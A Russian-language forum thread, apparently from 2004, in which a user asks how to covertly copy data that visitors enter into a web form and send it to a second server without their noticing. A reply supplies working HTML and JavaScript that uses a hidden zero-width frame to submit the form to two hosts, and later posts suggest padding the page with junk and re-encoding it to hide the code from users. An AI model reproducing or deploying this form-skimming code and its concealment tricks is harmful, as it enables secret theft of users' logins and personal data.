Чаты копирование в сднржимого из формы в  форму

Discussion in 'Веб-уязвимости' started by wizard, 23 Mar 2004.

  1. wizard

    wizard New Member

    Joined:
    30 Dec 2003
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Люди кто может подсказать, как скопировать вводимые пользователем данные , так чтобы он этого не заметил !

    Тоесь ,он заполняет поля формы и жмет кнопку ,
    данные отпровляются на сервер , допустим ххххх.хх,
    а надо чотбы отправлялись и на ххххх.хх , и на ууууу.уу

    вот такая вот хрень  [​IMG]

    Буду благодарен по по гроб
     
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Сначала делаем страничку из двух фреймов:
    <frameset   cols="100%,0">
    <frame name="frame1" src="1.html"></frame>
    <frame name="frame2" src="about:blank"></frame>
    </frameset>

    Далее в файл 1.html записываем HTML формы:

    < script type="text/javascript" language="JavaScript">
    function _onsubmit()
    {//отправляем на один сервер
    document.forms[0].action="http://xxxx.ru";
    document.forms[0].target = "frame1";
    document.forms[0].submit();
    //отправляем на другой сервер
    document.forms[0].action="http://yyyy.ru";
    document.forms[0].target = "frame2";
    document.forms[0].submit();
    }
    </script>

    <form onSubmit="_onsubmit()">
    <input type="Text">
    <button  type="submit">submit</button>
    </form>
     
  3. wizard

    wizard New Member

    Joined:
    30 Dec 2003
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    супер
    это то что надо !
    я твой должник  [​IMG]
    сенькю
     
  4. Rabid Rabbit

    Rabid Rabbit Elder - Старейшина

    Joined:
    31 Aug 2003
    Messages:
    161
    Likes Received:
    15
    Reputations:
    -9
    Да, действительно заметить это трудно=) Небольшое дополнение насчет как сделать обнаружение потруднее: наваять воды в хтмл странице - это понятно, чем больше всякого дерьма тем лучше. Затем сохранить страницу в кодировке утф (уникод), авось юзверь поленитца ее назад раскодировать. Зато буквы чередуются и возвратов каретки нет, читать удобно=)
     
  5. Dark_Ghost

    Dark_Ghost New Member

    Joined:
    14 Aug 2003
    Messages:
    73
    Likes Received:
    1
    Reputations:
    0
    а моно заюзать encode в протоколе http